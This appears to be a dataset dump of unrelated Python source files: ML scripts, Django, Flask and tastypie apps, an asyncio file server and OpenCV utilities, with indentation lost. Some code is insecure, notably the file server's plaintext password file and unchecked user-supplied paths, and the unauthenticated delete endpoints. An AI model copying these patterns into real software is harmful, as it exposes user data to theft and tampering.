# take the mean value, no idea how to handle this better, but it never happened so far...
self.results[features] = (self.results[features] + svm_score) / 2.0
print(msg + " done!")
return
def add_scores_to_csv(self):
outfname = os.path.basename(self["output_csv"])
print("Writing output csv {0} ...".format(outfname))
msg = "Writing output csv {0} (line ~{1})..."
with open(self["output_csv"], "w", newline="") as out_csv, open(
self.csv_path, "r"
) as in_csv:
reader = csv.DictReader(in_csv)
writer = csv.DictWriter(out_csv, reader.fieldnames + [self._svm_score_name])
writer.writeheader()
for i, row in enumerate(reader):
if i % 1000 == 0:
print(msg.format(outfname, i), end="\r")
features = self.nan_replacer.transform(
np.array([self.row_to_features(row)])
)
features_scaled = tuple(list(self.scaler.transform(features)[0]))
SVMScore = self.results[features_scaled]
row[self._svm_score_name] = SVMScore
writer.writerow(row)
print("\n")
return
def __str__(self):
out_str = ["\n\tpyPercolator Options:"]
for option, value in self.items():
out_str.append("{0:·<25}{1}".format(option, value))
return "\n".join(out_str)
if __name__ == "__main__":
s = SVMWrapper()
print(s) # print parameter/settings overview
s.determine_csv_sorting()
s.find_shitty_decoys()
print("\nCounter:")
print(s.counter)
print()
s.count_intra_set_features()
s.collect_data()
print(
"Splitting data in half to avoid training and testing on the same features..."
)
skfold = StratifiedKFold(s.categories, n_folds=2, shuffle=True)
# use one half to score the other half, and vice versa:
for i, (train_index, test_index) in enumerate(skfold):
current_half = "1st" if i == 0 else "2nd"
other_half = "2nd" if i == 0 else "1st"
print(
"\nUsing high-scoring PSMs and decoys of the {0} half to train...".format(
current_half
)
)
mask = s.categories[train_index] != 0
train_categories = s.categories[train_index][mask]
train_features = s.X[train_index][mask]
svm_classifier = s.train(
training_matrix=train_features,
training_categories=train_categories,
)
print(
"Using the trained SVM to classify all PSMs of the {0} half".format(
other_half
)
)
s.classify(
svm_classifier,
s.X[test_index],
)
if s["kernel"].lower() == "linear":
print() # print SVM coefficients (only works for linear kernel)
print(svm_classifier.coef_)
print()
print("\nCounter:")
print(s.counter)
print()
s.add_scores_to_csv()
|
24,149 | d4908911b79a29efb56e81eb60c83130ed692376 | import httplib2
from django.shortcuts import render, redirect
from django.views.decorators.http import require_POST
from datetime import datetime, timezone
from django.core.mail import send_mail
from django.conf import settings
from .models import Todo
from .forms import TodoForm
def index(request):
todo_list = Todo.objects.order_by('date')
for todo in todo_list:
if todo.date.date() < datetime.now().date():
todo.complete = True
todo.save()
time = datetime.now()
form = TodoForm()
context = {'todo_list': todo_list, 'form': form, 'time': time}
return render(request, 'todo/index.html', context)
@require_POST
def addTodo(request):
form = TodoForm(request.POST)
print(request.POST['text'], request.POST['date'])
if form.is_valid():
new_todo = Todo(text=request.POST['text'], date=form.cleaned_data['date'])
new_todo.save()
subject = "Time for ToDo's :)"
message = ' Your ToDo has a new event added. Checkout ToDo app :)'
email_from = settings.EMAIL_HOST_USER
recipient_list = ['ADD RECIPIENT EMAIL', ]
result = send_mail(subject, message, email_from, recipient_list)
print(result)
return redirect('index')
def completeTodo(request, todo_id):
todo = Todo.objects.get(pk=todo_id)
todo.complete = True
todo.save()
return redirect('index')
def deleteCompleted(request):
Todo.objects.filter(complete__exact=True).delete()
return redirect('index')
def deleteAll(request):
Todo.objects.all().delete()
return redirect('index')
|
24,150 | fa517ec4039d011a4c5f19332b436c59b68eacc1 | class Solution:
# @param A : string
# @param B : list of strings
# @return a list of strings
def wordBreak(self, s, wordDict):
return findWords(0, len(s), s, wordDict, {})
def findWords(start, end, s, wordDict, cache):
if start in cache:
return cache[start]
cache[start] = []
current = start
candidate = ''
while current < end:
candidate += s[current]
current += 1
if candidate in wordDict:
if current == end:
cache[start].append(candidate)
else:
for x in findWords(current, end, s, wordDict, cache):
cache[start].append(candidate + ' ' + x)
return cache[start]
|
24,151 | 327990f259b7b16c8fb1b39cad0666809dc84646 | from wxpusher import pusher
pusher.send_msg("train task end") |
24,152 | 7e4c48d34695ffb0f0ce355edf725529a4835309 | s1 = "His name is {0}!".format("Arthur")
print(s1)
name = "Alice"
age = 10
s2 = "I am {1} and I am {0} years old.".format(age, name)
print(s2)
n1 = 4
n2 = 5
s3 = "2**10 = {0} and {1} * {2} = {3:f}".format(2**10, n1, n2, n1 * n2)
print(s3)
n1 = "Paris"
n2 = "Whitney"
n3 = "Hilton"
print("Pi to three decimal places is {0:.3f}".format(3.1415926))
print("123456789 123456789 123456789 123456789 123456789 123456789")
print("|||{0:<15}|||{1:^15}|||{2:>15}|||Born in {3}|||".format(n1,n2,n3,1981))
print("The decimal value {0} converts to hex value {0:x}".format(123456))
letter = """
Dear {0} {2}.
{0}, I have an interesting money-making proposition for you!
If you deposit $10 million into my bank account, I can
double your money ...
"""
print(letter.format("Paris", "Whitney", "Hilton"))
print(letter.format("Bill", "Henry", "Gates"))
#printing table with only tabs
print("i\ti**2\ti**3\ti**5\ti**10\ti**20")
for i in range(1, 11):
print(i, "\t", i**2, "\t", i**3, "\t", i**5, "\t", i**10, "\t", i**20)
#printing table with string formatting
layout = "{0:>4}{1:>6}{2:>6}{3:>8}{4:>13}{5:>24}"
print(layout.format("i", "i**2", "i**3", "i**5", "i**10", "i**20"))
for i in range(1, 11):
print(layout.format(i, i**2, i**3, i**5, i**10, i**20)) |
24,153 | eb7ef047db578ceb11bc236255bfec9ca9257a8a | import asyncio
from datetime import datetime
import os
import re
import signal
import time
signal.signal(signal.SIGINT, signal.SIG_DFL)
class Client:
def __init__(self, name):
self.name = name
self.current_folder = os.path.join(os.getcwd(), self.name)
self.r_file = ""
self.char_counter = 0
os.makedirs(self.current_folder, exist_ok=True)
def make_dir(self, name):
if len(name) < 0:
return "Name is empty"
try:
os.makedirs(os.path.join(self.current_folder, name))
self.current_folder = os.path.join(self.current_folder, name)
except FileExistsError:
return "File already exists"
return "Folder created successful"
def list(self):
message = "List of " + self.current_folder + "\n\n"
message += "name\tsize\tcreate date\n"
for file in os.listdir(self.current_folder):
path = os.path.join(self.current_folder, file)
date_time = datetime.fromtimestamp(os.stat(path).st_ctime)
message += "{}\t{}\t{}\n".format(file, os.stat(path).st_size, date_time.strftime("%m/%d/%Y, %H:%M:%S"))
return message
def write_file(self, name, input):
##todo проверить есть ли файл
if len(input) > 0:
with open(os.path.join(self.current_folder, name.decode()), "a") as file:
file.write(input.decode())
else:
with open(os.path.join(self.current_folder, name.decode(), ), "w") as file:
if len(input) > 0:
file.write(input.decode())
return "Operation 'write_file' is completed"
def read_file(self, name=b""):
file_name = name.decode()
if len(file_name) == 0:
file_name = os.path.basename(self.r_file)
if file_name == "":
return "File {} doesn't opened. You need open file for the first"
self.r_file = ""
self.char_counter = 0
return "File {} is closed".format(file_name)
file_path = os.path.join(self.current_folder, name.decode())
if self.r_file != file_path:
self.r_file = file_path
self.char_counter = 0
if os.path.isfile(file_path):
with open(file_path, "r") as f:
data = f.read()
self.char_counter += 100
data = data[self.char_counter - 100:self.char_counter]
if len(data) > 0:
basename = os.path.basename(self.r_file)
return "Data from {}:\n\n{}".format(basename, data)
else:
self.char_counter = 0
return "End of file"
else:
return "File {} doesn't exists".format(name.decode())
def change_folder(self, name):
if name.decode() == "..":
if self.current_folder == os.path.join(os.getcwd(), self.name):
return "Out of current working directory"
dirname, _ = os.path.split(self.current_folder)
self.current_folder = dirname
else:
path = os.path.join(self.current_folder, name.decode())
if os.path.exists(path) and os.path.isdir(path):
self.current_folder = path
else:
return "{} does not point to a folder in the current working directory".format(name.decode())
return "Operation 'change_folder' is completed"
# todo Надо сделать чтобы клиент вводил команды
async def register(reader, writer):
writer.write("Input username! ".encode())
data = await reader.read(1000)
username = data.decode()
writer.write("Input password! ".encode())
data = await reader.read(1000)
password = data.decode()
user_check = False
with open("UserList.txt", "r") as file:
for line in file:
if username in line.split(":"):
user_check = True
break
if user_check:
writer.write("User already exists!".encode())
else:
with open("UserList.txt", "a") as file:
file.write("{username}:{password}\n".format(username=username, password=password))
Client(username)
writer.write("User has been created!".encode())
async def replace(source_file_path, pattern, substring):
file_handle = open(source_file_path, 'r')
file_string = file_handle.read()
file_handle.close()
file_string = (re.sub(pattern, substring, file_string))
file_handle = open(source_file_path, 'w')
file_handle.write(file_string)
file_handle.close()
async def login(reader, writer):
writer.write("Input username: ".encode())
data = await reader.read(1000)
username = data.decode()
writer.write("Input password".encode())
data = await reader.read(1000)
password = data.decode()
user_check = False
with open("UserList.txt", "r") as file:
for line in file:
user_info = line.strip().split(":")
if username in user_info and password in user_info:
if "Online" not in user_info:
user_check = True
break
else:
user_check = "Online"
if user_check == "Online":
return False, username, password, "User already online"
if user_check:
await replace("UserList.txt", f'{username}:{password}\n', f'{username}:{password}:Online\n')
return True, username, password, ""
else:
print("ERROR")
return False, username, password, "Incorrect username or password"
def commands(writer, client):
display_data = """Welcome
How can I help you
create_folder <name> --> Create new folder <name>
write_file <name> <input> --> Write <input> into <name> or Create a new file <name>
read_file <name> --> Read data from the file <name> in the current working directory
list --> View list of folders and files
change_folder <name> --> Move the current working directory for the current user to the specified folder residing in the current folder
register <username> <password> --> Register a new user to the server using the <username> and <password> provided
login <username> <password> --> Log in the user conforming with <username> onto the server if the <password> provided matches the password used while registering
quit --> Logout
Please select the option
Select (Current working directory: {}): """.format(client.current_folder)
writer.write(display_data.encode())
async def menu(reader, writer, status, username, password, message="Error"):
if status:
client = Client(username)
commands(writer, client)
while True:
try:
data = await reader.read(1000)
if len(data) > 0:
choise = data.decode().strip().split(' ', 2)
if "quit" in choise[0]:
await replace("UserList.txt", f'{username}:{password}:Online\n', f'{username}:{password}\n')
break
elif "create_folder" in choise[0]:
name = choise[1]
writer.write("{}\nSelect (Current working directory: {}): ".format(
client.make_dir(name),
client.current_folder).encode())
writer.write(client.make_dir(name).encode())
elif "list" in choise[0]:
writer.write("{}\nSelect (Current working directory: {}): ".format(
client.list(),
client.current_folder).encode())
elif "write_file" in choise[0]:
writer.write("{}\nSelect (Current working directory: {}): ".format(
client.write_file(choise[1].encode(), choise[2].encode()),
client.current_folder).encode())
elif "change_folder" in choise[0]:
writer.write("{}\nSelect (Current working directory: {}): ".format(
client.change_folder(choise[1].encode()),
client.current_folder).encode())
elif "read_file" in choise[0]:
if len(choise) > 1:
writer.write("{}\nSelect (Current working directory: {}): ".format(
client.read_file(choise[1].encode()),
client.current_folder).encode())
else:
writer.write("{}\nSelect (Current working directory: {}): ".format(
client.read_file("".encode()),
client.current_folder).encode())
elif "register" in choise[0]:
register(reader, writer)
elif "commands" in choise[0]:
commands(writer, client)
else:
writer.write("\nSelect (Current working directory: {}): ".format(
client.current_folder
).encode())
else:
writer.write("\nSelect (Current working directory: {}): ".format(
client.current_folder
).encode())
except OSError:
await replace("UserList.txt", f'{username}:{password}:Online\n', f'{username}:{password}\n')
break;
else:
writer.write(message.encode())
async def start(reader, writer):
try:
message = "Are you a registered user?\npress y to yes\tpress n to no\nEnter your choice::"
writer.write(message.encode())
data = await reader.read(1000)
answer = data.decode()
if answer == "y":
status, username, password, message = await login(reader, writer)
await menu(reader, writer, status, username, password, message)
elif answer == "n":
await register(reader, writer)
status, username, password, message = await login(reader, writer)
await menu(reader, writer, status, username, password, message)
else:
message = "Invalid choice\nPlease restart client"
writer.write(message.encode())
except ConnectionResetError:
pass
async def main():
server = await asyncio.start_server(
start, '127.0.0.1', 8088)
addr = server.sockets[0].getsockname()
print(f'Serving on {addr} started')
async with server:
await server.serve_forever()
if __name__ == '__main__':
asyncio.run(main())
|
24,154 | cb2222d5ffc832a49184c33abb9d465d5726f27f | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_excel('C:\\vscode\py\python_pigeon_farm\py_panda\电影信息.xlsx')
#print(df)
#接下来我们将对数据进行表示:将所有数据用由元组组成的列表表示
pairs=[]
for i in range(len(df)):
actors=df.at[i,'演员'].split(',')
for actor in actors:
pair=(actor,df.at[i,'电影名称'])
pairs.append(pair)
pairs=sorted(pairs,key=lambda item:int(item[0][2:]))
#print(pairs)
#下面我们整理新的表格:
index=[item[0] for item in pairs]
data=[item[1] for item in pairs]
df1=pd.DataFrame({'演员':index,'电影名称':data})
result = df1.groupby('演员', as_index=False, sort=False).count()
result.columns=('演员','电影数')
result.to_excel('C:\\vscode\py\python_pigeon_farm\py_panda/演员统计表.xlsx')
#print(result)
plt.figure(figsize=(5,5),dpi=100,facecolor='LightPink')
result.plot(x='演员',y='电影数',kind='bar')
plt.savefig('C:\\vscode\py\python_pigeon_farm\py_panda/演员统计表.png')
plt.show()
|
24,155 | e708d98bd88d5467e9611663139d9081c0f6374b | import databases
import sqlalchemy
from sqlalchemy.ext.declarative import DeclarativeMeta, declarative_base
from .config import settings
database = databases.Database(settings.SQLALCHEMY_DATABASE_URI)
engine = sqlalchemy.create_engine(settings.SQLALCHEMY_DATABASE_URI, pool_pre_ping=True)
Base: DeclarativeMeta = declarative_base()
|
24,156 | b8b8ebf0781ea8741a31f050037acac0a149047a | import math
import numpy as np
import cv2 as cv
# 1. Read TEST image.
img = cv.imread("image.jpg", cv.IMREAD_COLOR)
# 2. Initialize known information.
# - Table (corner coordinates).
# - Cue ball (location, radius).
# - Cue (2 points on the cue, including the coordinates of the tip).
table = [(163, 117), (1710, 120), (1836, 888), (63, 939)]
cue_ball = (590, 490)
cue_ball_radius = 30
cue_start = (203, 193) # Random point within cue
cue_tip = (533, 400)
balls = [
(180, 160),
(860, 373),
(963, 593),
(893, 693),
(1213, 783),
(1103, 643),
(1256, 556),
(1176, 243),
(1523, 206),
(1516, 253),
(1586, 503),
(1673, 716)
]
# 3. Get the warp matrix of the table angle and warp the image.
dst_shape = (table[1][0], table[2][1]-table[1][1])
src_pt = np.float32(table[:3])
dst_pt = np.float32([(0,0), (dst_shape[0],0), dst_shape])
warp_matrix = cv.getAffineTransform(src_pt, dst_pt)
img = cv.warpAffine(img, warp_matrix, dst_shape)
# src_pt = np.float32(table)
# dst_pt = np.float32([(0,0), (dst_shape[0],0), dst_shape, (0, dst_shape[1])])
# warp_matrix = cv.getPerspectiveTransform(src_pt, dst_pt)
# img = cv.warpPerspective(img, warp_matrix, dst_shape)
# 4. Correct known coordinates with the warp matrix.
def transform_point(pt, matrix):
is_list = type(pt) is list
if not is_list:
pt = [[pt]]
else:
pt = [[p] for p in pt]
array = np.array(pt)
transformed = cv.transform(array, matrix)
squeezed = np.squeeze(np.squeeze(transformed))
if not is_list:
return tuple(squeezed[:2])
return [tuple(x[:2]) for x in squeezed]
# table = transform_point(table, warp_matrix)
table = [(0, 0), (1710, 0), (1710, 768), (0, 768)]
cue_ball = transform_point(cue_ball, warp_matrix)
cue_start = transform_point(cue_start, warp_matrix)
cue_tip = transform_point(cue_tip, warp_matrix)
balls = transform_point(balls, warp_matrix)
pockets = table.copy()
x_center = int(img.shape[1] / 2)
pockets.append((x_center, 0))
pockets.append((x_center, img.shape[0]))
def update():
global img, table, cue_tip, cue_start, cue_ball, cue_ball_radius
hit_balls = []
shown_image = img.copy()
def points_to_angle(point1, point2):
return math.atan2(point2[1] - point1[1], point2[0] - point1[0])
# 5. Draw the trajectory
# 5.1 Get the cue angle based on 2 known points.
# - To get the angle in Radian measure use the atan2(y1-y2, x1-x2) function.
cue_angle = points_to_angle(cue_start, cue_tip)
# 5.2 Check if the cue angle overlaps with the location of the cue ball.
# - Check if the distance of the cue ball to the line is not more than the radius of the cue ball.
# - Distance is using: abs(ax - by + c) / sqrt(aa + bb)
# - a = y2-y1
# - b = x2-x1
# - c = x2y1 + y2x1
# - x, y = point of cue ball center.
# - Extra check if the cue ball is not behind the cue tip.
# http://www.pygame.org/wiki/IntersectingLineDetection
def line_intersect(line1, line2):
def gradient(points):
if points[0][0] == points[1][0]:
return None
return (points[0][1] - points[1][1]) / (points[0][0] - points[1][0])
def y_intersect(p, m):
return p[1] - (m * p[0])
m1, m2 = gradient(line1), gradient(line2)
if m1 == m2:
return None
elif m1 is not None and m2 is not None:
b1 = y_intersect(line1[0], m1)
b2 = y_intersect(line2[0], m2)
x = (b2 - b1) / (m1 - m2)
pt = x, (m1 * x) + b1
elif m1 is None:
b2 = y_intersect(line2[0], m2)
pt = line2[0][0], (m2 * line1[0][0]) + b2
else:
b1 = y_intersect(line1[0], m1)
pt = line2[0][0], (m1 * line2[0][0]) + b1
return tuple(int(x) for x in pt)
def line_circle_collision(pt1, pt2, center, circle_radius):
global img
# Point opposite of circle
if (min(pt2[0], img.shape[1]) - pt1[0]) < 0 == (max(pt2[0], 0) - center[0] < 0) or (pt2[1] - pt1[1]) < 0 == (
pt2[1] - center[1]) < 0:
return False
a = (pt2[1] - pt1[1])
b = (pt2[0] - pt1[0])
c = (pt2[0] * pt1[1]) - (pt2[1] * pt1[0])
x, y = center
dist = abs(a * x - b * y + c) / math.sqrt(a * a + b * b)
if circle_radius >= dist:
return True
else:
return False
# https://stackoverflow.com/questions/29384494/the-intersection-between-a-trajectory-and-the-circles-in-the-same-area
def line_circle_intersection(pt1, pt2, center, circle_radius):
x1, y1 = [int(x) for x in pt1]
x2, y2 = [int(x) for x in pt2]
xc, yc = [int(x) for x in center]
r = circle_radius
dx = x1 - x2
dy = y1 - y2
rx = xc - x1
ry = yc - y1
a = dx * dx + dy * dy
b = dx * rx + dy * ry
c = rx * rx + ry * ry - r * r
# Now solve a*t^2 + 2*b*t + c = 0
d = b * b - a * c
if d < 0.:
# no real intersection
return
s = math.sqrt(d)
t1 = (- b - s) / a
t2 = (- b + s) / a
points = []
if 0. <= t1 <= 1.:
points.append(tuple([round((1 - t1) * x1 + t1 * x2), round((1 - t1) * y1 + t1 * y2)]))
if 0. <= t2 <= 1.:
points.append(tuple([round((1 - t2) * x1 + t2 * x2), round((1 - t2) * y1 + t2 * y2)]))
return points
def invert_angle(angle):
return (angle + math.pi) % (2 * math.pi)
if line_circle_collision(cue_start, cue_tip, cue_ball, cue_ball_radius):
# 5.3 Get the angle of the cue ball trajectory.
trj_angle = cue_angle
start_point = cue_ball
collisions = 1
while collisions <= 5:
collisions += 1
# 5.4 Use the angle, center and radius of the cue ball to calculate at which point the line starts.
# - The point is: x = (x1 + r + cos(radians)), y = (y1 + r + sin(radians))
end_point = (int(start_point[0] + 2000 * np.cos(trj_angle)), int(start_point[1] + 2000 * np.sin(trj_angle)))
# 5.5 Draw the trajectory.
# - When the edge of the image is released then continue on a new angle or stop after 5 collision.
line = np.array([start_point, end_point])
# Filter out balls that are possible to hit
selected_balls = []
for i in range(0, len(balls)):
if i not in hit_balls:
selected_balls.append(balls[i])
# Sort the balls based on distance
def point_distance(pt1, pt2):
return math.sqrt(math.pow(pt2[0]-pt1[0], 2)+math.pow(pt2[1]-pt1[1], 2))
def point_by_angle(pt, angle, distance):
x = pt[0] + (distance * math.cos(angle))
y = pt[1] + (distance * math.sin(angle))
return tuple([round(x), round(y)])
selected_balls.sort(key=lambda ball: point_distance(start_point, ball))
ball_hit = False
for ball in selected_balls:
if ball in hit_balls:
continue
if line_circle_collision(start_point, end_point, ball, cue_ball_radius*2):
points = line_circle_intersection(start_point, end_point, ball, cue_ball_radius*2)
if len(points) <= 0 or start_point == points[0]:
continue
end_point = points[0]
cv.circle(shown_image, end_point, cue_ball_radius, (0, 255,255), thickness=2)
ball_hit = True
trj_angle = invert_angle(points_to_angle(ball, end_point))
cv.line(shown_image, end_point, point_by_angle(end_point, trj_angle, img.shape[1]*2), (255, 100, 255), thickness=3)
if cue_angle > points_to_angle(start_point, ball):
trj_angle += math.pi / 2
else:
trj_angle -= math.pi / 2
hit_balls.append(ball)
break
if ball_hit:
cv.line(shown_image, start_point, end_point, (100, 100, 255), thickness=3)
start_point = end_point
continue
# Added check so trajectory stops at pocket
in_pocket = False
for pocket in pockets:
if line_circle_collision(start_point, end_point, pocket, 40): # approximate pocket size in this example
points = line_circle_intersection(start_point, end_point, pocket, 40)
if len(points) <= 0:
continue
in_pocket = True
end_point = points[0]
break
if in_pocket:
cv.line(shown_image, start_point, end_point, (100, 100, 255), thickness=3)
break
sides = [0, 0]
if trj_angle < 0:
sides[0] = 0
else:
sides[0] = 2
if abs(trj_angle) < (math.pi / 2):
sides[1] = 1
else:
sides[1] = 3
found = False
for i in sides:
boundary = np.array([table[i], table[0 if i + 1 > 3 else i + 1]], dtype=float)
point = line_intersect(line.astype(np.float), boundary)
if point is None:
continue
if 0 <= point[0] <= img.shape[1] and 0 <= point[1] <= img.shape[0]:
cv.circle(shown_image, point, 10, (0, 0, 255), thickness=3)
cv.line(shown_image, start_point, point, (100, 100, 255), thickness=3)
start_point = point
if i == 1 or i == 3:
if trj_angle > 0:
trj_angle = math.pi - trj_angle
else:
trj_angle = -(trj_angle + math.pi)
else:
trj_angle = -trj_angle
if trj_angle > math.pi:
trj_angle = math.pi - trj_angle
elif trj_angle < -math.pi:
trj_angle = math.pi + trj_angle
hit_x = int(start_point[0] + 2000 * np.cos(trj_angle))
hit_y = int(start_point[1] + 2000 * np.sin(trj_angle))
end_point = (hit_x, hit_y)
found = True
break
if not found:
break
# DEBUG OPTIONS:
# - Draw circles where the points are on the cue
cv.line(shown_image, cue_tip, cue_start, (255, 255, 0), thickness=6)
cv.circle(shown_image, cue_tip, 6, (0, 0, 0), thickness=-1)
cv.circle(shown_image, cue_start, 6, (0, 0, 0), thickness=-1)
cv.circle(shown_image, cue_ball, 6, (0, 255, 0), thickness=-1)
for pocket in pockets:
cv.circle(shown_image, pocket, 40, (0, 255, 0), thickness=2)
# - Let the cue be determined by mouse positions.
# - Clicking outputs the coordinates of the mouse.
def mouse_event(event, x, y, flags, param):
global cue_start, cue_tip
if event == cv.EVENT_LBUTTONDOWN:
cue_start = (x, y)
if event == cv.EVENT_RBUTTONDOWN:
cue_tip = (x, y)
update()
cv.namedWindow("img", cv.WINDOW_NORMAL)
cv.setMouseCallback("img", mouse_event)
cv.imshow("img", shown_image)
if(cv.waitKey(0) == 27):
exit(200)
update()
|
24,157 | c7c3dc42a0f3614f155aeff1417bb505f9d8efc4 | from .base import *
class LaneFinderPipeline:
def __init__(self):
# maybe we will need some params here
self.image = None
self.interesting_mask = None # interest zone mask is the same for each frame
self.previous_lines = None # we use the previous lines to average the new ones
def new(self):
""" We call new, when we want to apply the pipeline to something unrelated """
self.interesting_mask = None
self.previous_lines = None
def load_image(self, src):
if isinstance(src, str):
# print("Loading image from file %s" % src)
self.image = load_image(src)
else:
self.image = src
def apply_region_of_interest(self, src=None):
img = src if src is not None else self.image
if self.interesting_mask is None:
self.interesting_mask = get_mask(img)
return cv2.bitwise_and(img, self.interesting_mask)
def process_pipeline(self,
show_intermediate=False, show_mask=False,
show_original=True, show_final=True):
image = self.image
if image is None:
raise Exception("Please load an image before starting the process")
if show_original:
plt.figure()
plt.title("Original")
plt.imshow(image)
gray = image_to_int(grayscale(image))
canned = self.apply_region_of_interest(canny(gaussian_blur(gray)))
# Hough:
lines = hough_lines(canned) # get all the lines from canny
# normal_hug = hough(canned, lines, color=(0, 255, 0))
if self.previous_lines: # we add the previous known lanes in the mix
lines = list(lines) + self.previous_lines
lines = lane_enhance(lines) # consider the meaningful lines and average/extend them
hug = hough(canned, lines=lines)
self.previous_lines = lines
# let's build a nice output using some intermediate result
combo = self.image
if show_mask:
mask = get_mask(image, mask_color=(0, 200, 0))
combo = weighted_img(combo, mask, .2, 1.)
# combo = weighted_img(combo, normal_hug)
combo = weighted_img(hug, combo)
if show_final:
plt.figure()
plt.title('Combined')
plt.imshow(combo)
return combo
# pipeline = LaneFinderPipeline()
# pipeline.load_image('lane_test_images/solidWhiteRight.jpg')
# result = pipeline.process_pipeline(show_original=False, show_intermediate=False, show_mask=True)
|
24,158 | a81170b005ab683b333400c0556b5651101fc3de | text = input()
if text == "" or text == "/n":
print("ДА")
else:
print("НЕТ") |
24,159 | a18ef3d38eebaef85b8fb7065c1f574c08345b48 | from flask import Flask, render_template, request, redirect, url_for
import json
app = Flask(__name__)
debug = False
blogJsonFilename = 'blog.json' if debug else '/var/www/akilduff/blog.json'
@app.route('/')
def index():
return page(1)
@app.route('/page/<num>')
def page(num):
blog = []
with open(blogJsonFilename) as jsonFile:
jsonStr = jsonFile.read()
blog = sorted(json.loads(jsonStr), key = lambda post: post['id'])
pageCount = (len(blog) / 10) if (len(blog) % 10) == 0 else (int(len(blog) / 10) + 1)
num = int(num)
if num < 1 or num > pageCount:
return notfound(None)
startIndex = 0 if (len(blog) < (num * 10)) else (len(blog) - (num * 10))
endIndex = len(blog) - ((num - 1) * 10)
posts = blog[startIndex:endIndex][::-1]
showPrev = num > 1
showNext = len(blog) > (num * 10)
return render_template('blog.html', posts = posts, showPrev = showPrev, showNext = showNext, num = num)
@app.route('/post/<num>')
def post(num):
blog = []
with open(blogJsonFilename) as jsonFile:
jsonStr = jsonFile.read()
blog = json.loads(jsonStr)
for post in blog:
if str(post['id']) == num:
return render_template('post.html', post = post)
return notfound(None)
@app.route('/about')
def about():
return render_template('about.html')
@app.route('/donate')
def donate():
return render_template('donate.html')
@app.errorhandler(404)
def notfound(error):
return render_template('404.html'), 404
if debug:
app.run()
|
24,160 | a74cad83553b59d8824f9968754e66f8ce4f6271 | # Ao testar sua solução, não se limite ao caso de exemplo.
hE = float(input())
hP = float(input())
print(hE, "extras e ", hP, " de falta")
h = hE - 0.25 * hP
if(h <= 400):
print("R$ 100.0")
else:
print("R$ 500.0") |
24,161 | a663a3151ee59f1ba1366fb430b65667af718354 | """
api.py
"""
from tastypie.authorization import Authorization, DjangoAuthorization
from tastypie.resources import ALL
from tastypie.fields import DictField
from mongoengine.django.auth import User
from tastypie_mongoengine import resources
from bson.objectid import ObjectId
from hopscotch.mongo_tastypie.auth import MongoAuthentication, MongoAuthorization
from hopscotch.dram.documents import Drink, Checkin
class PublicResource(resources.MongoEngineResource):
"""
A resource for the public feed.
"""
class Meta:
queryset = Checkin.objects.all()
allowed_methods = ('get',)
class DrinkResource(resources.MongoEngineResource):
"""
A resource for drinks.
"""
class Meta:
queryset = Drink.objects.all()
allowed_methods = ('get', 'post', 'put', 'delete')
authorization = Authorization()
filtering = {
'name': ALL,
'id': ALL,
}
class CheckinResource(resources.MongoEngineResource):
"""
A resource for drinks.
"""
drink = DictField()
class Meta:
queryset = Checkin.objects.all()
allowed_methods = ('get', 'post', 'put', 'delete')
resource_name = 'checkin'
authorization = Authorization()
filtering = {
'name': ALL,
'id': ALL,
'drink_id': ALL,
'user_id': ALL,
}
def dehydrate_drink(self, bundle):
print bundle.obj.drink_id
try:
drink = Drink.objects.get(id=bundle.obj.drink_id)
dehydrate_dict = drink._data.copy()
dehydrate_dict.pop(None)
dehydrate_dict['id'] = drink.id
return(dehydrate_dict)
except AttributeError:
return(None)
# class UserResource(resources.MongoEngineResource):
# """
# A user resource
# """
# class Meta:
# queryset = User.objects.all()
# allowed_methods = ('get', 'post', 'put', 'delete')
# authorization = Authorization()
|
24,162 | 087a2ceba2542308335379769432cd401ccaefea | import sqlite3
import json
from models.entry import Entry
from models.mood import Mood
def get_all_entries():
with sqlite3.connect("./dailyjournal.db") as conn:
conn.row_factory = sqlite3.Row
db_cursor = conn.cursor()
db_cursor.execute("""
SELECT
a.id,
a.concept,
a.entry,
a.date,
a.moodId,
m.label mood_label
FROM entries a
JOIN moods m
ON m.id = a.moodId
""")
entries = []
dataset = db_cursor.fetchall()
for row in dataset:
entry = Entry(row['id'], row['concept'], row['entry'], row['date'], row['moodId'])
mood = Mood(row['moodId'], row['mood_label'])
entry.mood = mood.__dict__
entries.append(entry.__dict__)
return json.dumps(entries)
def get_single_entry(id):
with sqlite3.connect("./dailyjournal.db") as conn:
conn.row_factory = sqlite3.Row
db_cursor = conn.cursor()
# Use a ? parameter to inject a variable's value
# into the SQL statement.
db_cursor.execute("""
SELECT
a.id,
a.concept,
a.entry,
a.date,
a.moodId
FROM entries a
WHERE a.id = ?
""", ( id, ))
data = db_cursor.fetchone()
entry = Entry(data['id'], data['concept'], data['entry'], data['date'], data['moodId'])
return json.dumps(entry.__dict__)
def search_for_entry(search_term):
with sqlite3.connect("./dailyjournal.db") as conn:
conn.row_factory = sqlite3.Row
db_cursor = conn.cursor()
db_cursor.execute("""
SELECT
a.id,
a.concept,
a.entry,
a.date,
a.moodId
FROM entries a
WHERE a.entry LIKE ?
""", ( '%'+search_term+'%', ))
entries = []
dataset = db_cursor.fetchall()
for row in dataset:
entry = Entry(row['id'], row['concept'], row['entry'], row['date'], row['moodId'])
entries.append(entry.__dict__)
return json.dumps(entries)
def delete_entry(id):
with sqlite3.connect("./dailyjournal.db") as conn:
db_cursor = conn.cursor()
db_cursor.execute("""
DELETE FROM entries
WHERE id = ?
""", (id, ))
def new_journal_entry(new_entry):
with sqlite3.connect("./dailyjournal.db") as conn:
db_cursor = conn.cursor()
db_cursor.execute("""
INSERT INTO entries
( concept, entry, date, moodId )
VALUES
( ?, ?, ?, ?);
""", (new_entry['concept'],new_entry['entry'],
new_entry['date'],new_entry['moodId'], ))
# The `lastrowid` property on the cursor will return
# the primary key of the last thing that got added to
# the database.
id = db_cursor.lastrowid
# Add the `id` property to the entry dictionary that
# was sent by the client so that the client sees the
# primary key in the response.
new_entry['id'] = id
return json.dumps(new_entry)
def update_entry(id, new_entry):
with sqlite3.connect("./dailyjournal.db") as conn:
db_cursor = conn.cursor()
db_cursor.execute("""
UPDATE entries
SET
concept = ?,
entry = ?,
date = ?,
moodId = ?
WHERE id = ?
""", (new_entry['concept'], new_entry['entry'],
new_entry['date'], new_entry['moodId'], id, ))
rows_affected = db_cursor.rowcount
if rows_affected == 0:
return False
else:
return True
|
24,163 | 0e496e401716ad14819fcb664df06c4c831ff72d | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import numpy as np
from PIL import Image
def scale(input_img, size):
"""
scale the input image to the specific size by using bilinear interpolation
algorithm implement according to https://en.wikipedia.org/wiki/Bilinear_interpolation
